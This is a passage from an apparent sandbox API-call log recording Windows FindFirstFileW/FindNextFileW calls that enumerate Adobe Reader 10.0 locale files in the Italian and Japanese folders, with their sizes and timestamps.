nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebLink.HUN", cAlternateFileName="")) returned 0 [0058.468] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.469] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d63ebe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it_IT", cAlternateFileName="")) returned 1 [0058.469] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d63ebe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d63ebe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d984a20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.ITA", cAlternateFileName="ACCESS~1.ITA")) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82a99780, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6a200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.ITA", cAlternateFileName="")) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801d5ec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.ITA", cAlternateFileName="ADOBEC~1.ITA")) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d6d1a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7c600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.ITA", cAlternateFileName="")) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x820558a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.ITA", cAlternateFileName="BRDLAN~1.ITA")) returned 1 [0058.471] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x20a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82abf8e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x21200, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82a99780, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa200, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82abf8e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da69260, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14400, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.ITA", cAlternateFileName="MAKEAC~1.ITA")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d63ebe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.ITA", cAlternateFileName="MULTIM~1.ITA")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d984a20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82abf8e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x82e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLITE.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f7de2a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x157000, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.ITA", cAlternateFileName="READOU~1.ITA")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dab5520, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.ITA", cAlternateFileName="")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7da8f3c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.ITA", cAlternateFileName="SAVEAS~1.ITA")) returned 1 [0058.472] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.ITA", cAlternateFileName="")) returned 1 [0058.473] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ae5a40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.ITA", cAlternateFileName="")) returned 1 [0058.473] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.473] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.476] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f71060, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.476] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8fdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.476] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.476] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f71060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.477] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.477] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7ddd5200, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.ITA", cAlternateFileName="")) returned 1 [0058.477] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4e4720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.ITA", cAlternateFileName="")) returned 1 [0058.477] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82a99780, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.ITA", cAlternateFileName="")) returned 1 [0058.477] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82a99780, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.ITA", cAlternateFileName="")) returned 0 [0058.477] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.477] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja_JP", cAlternateFileName="")) returned 1 [0058.477] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.479] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82f5c380, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82f5c380, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.479] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.JPN", cAlternateFileName="ACCESS~1.JPN")) returned 1 [0058.479] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b0bba0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x48c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81e8c820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.JPN", cAlternateFileName="ADOBEC~1.JPN")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82db9460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x56c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8207ba00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.JPN", cAlternateFileName="BRDLAN~1.JPN")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b31d00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b0bba0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82b31d00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.JPN", cAlternateFileName="")) returned 1 [0058.480] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.JPN", cAlternateFileName="")) returned 1 [0058.480] 